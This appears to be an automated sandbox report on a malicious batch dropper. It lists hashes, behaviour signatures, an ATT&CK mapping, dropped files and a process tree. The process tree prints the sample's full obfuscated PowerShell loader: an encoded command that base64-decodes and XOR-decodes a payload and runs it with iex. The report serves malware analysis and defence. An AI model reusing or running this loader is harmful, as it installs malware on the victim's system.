3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf

General

Target

Dropper.bat
Size

6KB
MD5

569d507e7fdc933deff3b58813d97aa4
SHA1

51024acd8743f7373d822fb12b51051f8a56863d
SHA256

3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf
SHA512

08044c392db675232715f6105463ebfb7287bf926ccbb1322b5b1f9556696c8d9f070cd10a639f04fc5afa5930f2fd37ead4700624d13ef88575b95aefa1cde8
SSDEEP

192:qQofeU+tLohTleG/wnO6ppxi5zBgH6sgUJ:zof5+tLohTleawO6jxi5zBYgO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3840	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3840	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3840	powershell.exe
3840	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3840	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3532 wrote to memory of 3840	3532	cmd.exe	80
PID 3532 wrote to memory of 3840	3532	cmd.exe	80
PID 3840 wrote to memory of 3188	3840	powershell.exe	82
PID 3840 wrote to memory of 3188	3840	powershell.exe	82
PID 3188 wrote to memory of 1008	3188	csc.exe	83
PID 3188 wrote to memory of 1008	3188	csc.exe	83

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dropper.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAGQAaQBFAGcATQBYAEoAdgBjAGgASgB3AFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAcABYADEAZwBuAEkAVABzADgATgBYAEkAQgBLAHkARQBtAE4AegA5ADgAQQBDAGMAOABKAGoAcwAvAE4AMwB3AGIAUABDAFkAMwBJAEQAMABpAEEAVABjAGcASgBEAHMAeABOAHkARgBwAFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAOABCAGoAbwBnAE4AegBNADIATwB6AHcAMQBhAFYAOQBZAFgAMQBnAGkASgB6AEEAKwBPAHoARgB5AE0AVAA0AHoASQBTAEYAeQBBAGoATQBtAE0AVABwAGYAVwBDAGwAZgBXAEgASgB5AGMAbgBJAEoARgBqADQAKwBHAHoAOABpAFAAUwBBAG0AZQBuAEEANQBOAHkAQQA4AE4AegA1AGgAWQBIAEIANwBEADEAOQBZAGMAbgBKAHkAYwBpAEkAbgBNAEQANAA3AE0AWABJAGgASgBqAE0AbQBPAHoARgB5AE4AeQBvAG0ATgB5AEEAOABjAGgAcwA4AEoAZwBJAG0ASQBIAEkAVgBOAHkAWQBDAEkARAAwAHgARQB6AFkAMgBJAEQAYwBoAEkAWABvAGIAUABDAFkAQwBKAGkAQgB5AE8AaAA4ADkATgBpAGMAKwBOADMANQB5AEkAUwBZAGcATwB6AHcAMQBjAGkASQBnAFAAVABFAGMATQB6ADgAMwBlADIAbABmAFcASABKAHkAYwBuAEkASgBGAGoANAArAEcAegA4AGkAUABTAEEAbQBlAG4AQQA1AE4AeQBBADgATgB6ADUAaABZAEgAQgA3AEQAMQA5AFkAYwBuAEoAeQBjAGkASQBuAE0ARAA0ADcATQBYAEkAaABKAGoATQBtAE8AegBGAHkATgB5AG8AbQBOAHkAQQA4AGMAaABzADgASgBnAEkAbQBJAEgASQBlAFAAVABNADIASABqAHMAdwBJAEQATQBnAEsAMwBvAGgASgBpAEEANwBQAEQAVgB5AFAARABNAC8ATgAzAHQAcABYADEAaAB5AGMAbgBKAHkAQwBSAFkAKwBQAGgAcwAvAEkAagAwAGcASgBuAHAAdwBPAFQAYwBnAFAARABjACsAWQBXAEIAdwBlAHcAOQBmAFcASABKAHkAYwBuAEkAaQBKAHoAQQArAE8AegBGAHkASQBTAFkAegBKAGoAcwB4AGMAagBjAHEASgBqAGMAZwBQAEgASQB3AFAAVAAwACsAYwBnAFEANwBJAEMAWQBuAE0AegA0AEMASQBEADAAbQBOAHoARQBtAGUAaABzADgASgBnAEkAbQBJAEgASQArAEkAaABNADIATgBpAEEAMwBJAFMARgArAGMAZwBjAGIAUABDAFoAaABZAEgASQAyAEoAUQBFADcASwBEAGQAKwBjAGkAYwA3AFAAQwBaAHkATgBEADQAYwBOAHkAVQBDAEkARAAwAG0ATgB6AEUAbQBmAG4ASQA5AEoAeQBaAHkASgB6AHMAOABKAG4ASQArAEkAagBRACsASABUADQAMgBBAGkAQQA5AEoAagBjAHgASgBuAHQAcABYADEAaAB5AGMAbgBKAHkASQBpAGMAdwBQAGoAcwB4AGMAaQBFAG0ATQB5AFkANwBNAFgASQBrAFAAVABzADIAYwBoAEEAcgBJAGoATQBoAEkAWABwADcAWAAxAGgAeQBjAG4ASgB5AEsAVgA5AFkAYwBuAEoAeQBjAG4ASgB5AGMAbgBJAGIAUABDAFkAQwBKAGkAQgB5AFAAagBzAHcAYwBtADkAeQBIAGoAMAB6AE4AaAA0ADcATQBDAEEAegBJAEMAdAA2AGMARABOAHcAZQBYAEEALwBjAEgAbAB3AEkAVAB0ADgAYwBIAGwAdwBOAGoANAArAGMASAB0AHAAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAHMAOABKAGcASQBtAEkASABJAHoAUAB5AEUANwBjAG0AOQB5AEYAVABjAG0AQQBpAEEAOQBNAFIATQAyAE4AaQBBADMASQBTAEYANgBQAGoAcwB3AGYAbgBKAHcARQB6ADkAdwBlAFgAQQBoAGMASABsAHcATwB3AEUAeABNAHoAeAB3AGUAWABBAFEAYwBIAGwAdwBKAHoAUQAwAE4AeQBCAHcAZQAyAGwAZgBXAEgASgB5AGMAbgBKAHkAYwBuAEoAeQBHAHoAdwBtAEEAaQBZAGcAYwBqAFEANwBQAEQATQArAGMAbQA5AHkARwB6AHcAbQBBAGkAWQBnAGYAQgBNADIATgBuAG8AegBQAHkARQA3AGYAbgBKAGkASwBtAHQAbgBlADIAbABmAFcASABKAHkAYwBuAEoAeQBjAG4ASgB5AEoAegBzADgASgBuAEkAOQBQAGoAWgB5AGIAMwBKAGkAYQBWADkAWQBjAG4ASgB5AGMAbgBKAHkAYwBuAEkARQBPAHkAQQBtAEoAegBNACsAQQBpAEEAOQBKAGoAYwB4AEoAbgBvADAATwB6AHcAegBQAG4ANQB5AGUAZwBjAGIAUABDAFoAaABZAEgAdABpAEsAbQBOACsAYwBtAEkAcQBaAG0ASgArAGMAagAwAG4ASgBuAEkAOQBQAGoAWgA3AGEAVgA5AFkAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAEUAOQBQAEMARQA5AFAAagBkADgAQgBTAEEANwBKAGoAYwBlAE8AegB3ADMAZQBqADAAKwBOAG4AdABwAFgAMQBoAHkAYwBuAEoAeQBjAG4ASgB5AGMAagBBAHIASgBqAGMASgBEADMASQBpAE0AeQBZAHgATwBuAEoAdgBjAGoAdwAzAEoAWABJAHcASwB5AFkAMwBDAFEAOQB5AEsAWABKAGkASwBtAFYAbgBjAGkAOQBwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkASAB6AE0AZwBJAFQAbwB6AFAAbgB3AFIAUABTAEkAcgBlAGkASQB6AEoAagBFADYAZgBuAEoAaQBmAG4ASQAwAE8AegB3AHoAUABuADUAeQBZADMAdABwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkAQgBEAHMAZwBKAGkAYwB6AFAAZwBJAGcAUABTAFkAMwBNAFMAWgA2AE4ARABzADgATQB6ADUAKwBjAG4AbwBIAEcAegB3AG0AWQBXAEIANwBZAGkAcABqAGYAbgBJADkAUABqAFoAKwBjAGoAMABuAEoAbgBJADkAUABqAFoANwBhAFYAOQBZAGMAbgBKAHkAYwBpADkAZgBXAEMAOQBmAFcASABBAFMAWAAxAGgAZgBXAEIATQAyAE4AbgA4AEcASwB5AEkAMwBjAG4AWQBoAEkARABGAHkAZgB4ADQAegBQAEQAVQBuAE0AegBVADMAYwBoAEUAQgBPAGoATQBnAEkAbgBKAGYAVwBGADkAWQBDAFEASQB6AEoAagBFADYARAAyAGgAbwBFAEMAcwBpAE0AeQBFAGgAZQBuAHQAZgBXAEgARgB5AEEAQgBjAFQARgBuAEkAUgBFAHcAQQBYAEYAQQBjAGUASABnAHQAZgBXAEgARgB5AEEAQgBjAEMASABoAE0AUgBGADMASQBHAEcAaABkAHkASABoAHMAYwBHAFgASQBUAEgAQgBaAHkARQB4AFEARwBGAHcAQgB5AEIAaABvAFgAYwBoADAASABCAGcASQBIAEIAbgBJAEwASABRAGQAeQBCAFIATQBjAEIAbgBJAEcASABYAEkAUQBGADMASQBSAEUAeAA0AGUARgB4AFoAeQBFAHgAdwBXAGMAZwBBAFgASABCAE0AZgBGADMASQBHAEcAaABkAHkAQgBoAGMAaABKAG4AdwAzAEsAagBkAHkAQgBoADEAeQBFAHgAdwBMAEIAaABvAGIASABCAFYAeQBDAHgAMABIAGMAZwBVAFQASABBAFoAZgBXAEMAVQAxAE4AeQBaAHkAYwBEAG8AbQBKAGkASQBoAGEASAAxADkASgBTAFUAbABmAEQAWQBnAFAAUwBJAHcAUABTAHAAOABNAFQAMAAvAGYAUwBFAHgAUABuADAAMABPADMAMAArAE0AUwBFADgATgBHAFUAaABJADIARgBsAEsAMgBNACsAWgBtAG8ALwBLAEQAeABsAEoAVwBkADkARwBuADgAZABKAHkAWQBpAEoAeQBaADgATgB5AG8AMwBiAFMAQQArAE8AVABjAHIAYgB6AHMAdwBKAGoARgBpAFkAaQBJAGkATwBqAFUAagBKAFcAWgBqAFkARwB0AGgAUABTAGcAcQBQAEQAQgBnAFkAegBCADAASQBTAFoAdgBLAEMAaABoAEsAegBBAHcATwBTAFIAMABOAGoANQB2AFkAMwBCAHkAZgB4ADEAeQBjAEIARgBvAEQAZwBjAGgATgB5AEEAaABEAG4AWQAzAFAAQwBSAG8AQgB3AEUAWABBAEIAdwBUAEgAeABjAE8ARQB5AEkAaQBGAGoATQBtAE0AdwA0AGUAUABUAEUAegBQAGcANABHAE4AegA4AGkARABoAHAALwBIAFMAYwBtAEkAaQBjAG0AZgBEAGMAcQBOADMAQgBmAFcAQQBFAG0ATQB5AEEAbQBmAHcASQBnAFAAVABFADMASQBTAEYAeQBmAHgAUQA3AFAAagBjAEMATQB5AFkANgBjAG4AQQBSAGEAQQA0AEgASQBUAGMAZwBJAFEANQAyAE4AegB3AGsAYQBBAGMAQgBGAHcAQQBjAEUAeAA4AFgARABoAE0AaQBJAGgAWQB6AEoAagBNAE8ASABqADAAeABNAHoANABPAEIAagBjAC8ASQBnADQAYQBmAHgAMABuAEoAaQBJAG4ASgBuAHcAMwBLAGoAZAB3AGMAZwA9AD0AIgANAAoAJABYAG8AcgBfAFYAYQBsACAAPQAgADgAMgANAAoAJAB4AHIAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAZQBoAGUAaABlACkADQAKACQAZgBhAGYAYQBmACAAPQAgACQAeAByACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAByAGUAdAB1AHIAbgAgACQAXwAgAC0AYgB4AG8AcgAgACQAWABvAHIAXwBWAGEAbAAgAH0ADQAKACQAZABlAGMAcwBjAHIAIAA9ACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AHUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZgBhAGYAYQBmACkADQAKAGkAZQB4ACAAJABkAGUAYwBzAGMAcgANAAoA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3840
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxqs02xd\uxqs02xd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3188
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES43C0.tmp" "c:\Users\Admin\AppData\Local\Temp\uxqs02xd\CSC2BD31DE91F8140898BC25FB27336B9D3.TMP"
      4⤵
      PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\H-Output.exe

Filesize
133KB

MD5
e3cf7c97f447b5fc6c04c9ea552b116b

SHA1
3d268c0ddfb85c473c34d7a110f4e81063f8915c

SHA256
6950f5de643c11d0675c79e5ff9da72f1a5b3c289ee753a92a3e370917512162

SHA512
42a5c6140ce3ff032b008f84919a18f2cf187080d0b85dfaacd22b9009a1a52815c0cc93e45ca5106d3ccb0d3c9c02af52a86fd480a5700409c740413698b193

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES43C0.tmp

Filesize
1KB

MD5
d8a8e8c3a5cc2fa9665d276f0364829c

SHA1
edad4cbf09d7a2f84b28a678459e228751b95ee8

SHA256
eeaabff01194ee0c42ba1f7b7c09b3d7b5ce800b57d566826a35c6e8f1f18b52

SHA512
78c4dc4b1dc02c6e0cc911697e256cc8e1db6855ee148008d9ead1ae08b813579481f54674adeb2fcdf6e87d443f372c3988463be00a029a8910f386fce01b18

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hspegqw0.yro.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\uxqs02xd\uxqs02xd.dll

Filesize
3KB

MD5
9769179d20686a2e1d2b92d089b8fa18

SHA1
5eae15fe1607d5784ba7ae279e5ccd0caeb9daee

SHA256
521beead1dc697521e401ae7ae3d5a2e07251cb4b7662b47f8dab4e5528a408a

SHA512
7057a9bda916ab1cf64b9fbc4893beb4d2262acba4596c701dc0f255ae4add5746794266303798843ead5bad1e3ae6d816e4e8af286f0fff3a93515f38c9a342

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxqs02xd\CSC2BD31DE91F8140898BC25FB27336B9D3.TMP

Filesize
652B

MD5
2aa6273882f2bb0fdb9696e60d6ca15c

SHA1
7603d2925dcb42e7bae8eb4aa119d6ba5156623c

SHA256
dfbb87d6e182e3a7881ff817c87f4bee773689c38583cb6f444f3db562e3b42c

SHA512
45aeb14ff901951f12428b8c49a1f853f12413b8fe17b2fd3a880be36641787cb538ac4ad9178a7e293b0d5de5085689501fd7197750ecb861a36a1919415cb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxqs02xd\uxqs02xd.0.cs

Filesize
954B

MD5
60c0d4aebef0d650d89729e1bf02de63

SHA1
4f1499e94be62af8a4ece3a8c505b3766c338ff7

SHA256
0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799

SHA512
9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxqs02xd\uxqs02xd.cmdline

Filesize
369B

MD5
47324dbff1b4463e2438ce037e1175ae

SHA1
e051dceeeb8521577107e50a1f68ae48d0ff8a5c

SHA256
477a4d3e687e43a992029b3da3f6637e96ed0cccd311a46a323dd28f7b36bc51

SHA512
aa4ab2ad993a1085e5073d971a7b99478212d10ef8dc3b03eff1bd5da3a805b9a86280b883c99c83210278679d2f6a89168a0a09fc8111a7570c8b4b11bc8326

Download Submit
memory/3840-13-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

Filesize
10.8MB

Download
memory/3840-0-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp

Filesize
8KB

Download
memory/3840-12-0x0000017875B70000-0x0000017875BB6000-memory.dmp

Filesize
280KB

Download
memory/3840-11-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

Filesize
10.8MB

Download
memory/3840-26-0x0000017875690000-0x0000017875698000-memory.dmp

Filesize
32KB

Download
memory/3840-10-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

Filesize
10.8MB

Download
memory/3840-9-0x0000017875600000-0x0000017875622000-memory.dmp

Filesize
136KB

Download
memory/3840-38-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp

Filesize
8KB

Download
memory/3840-39-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing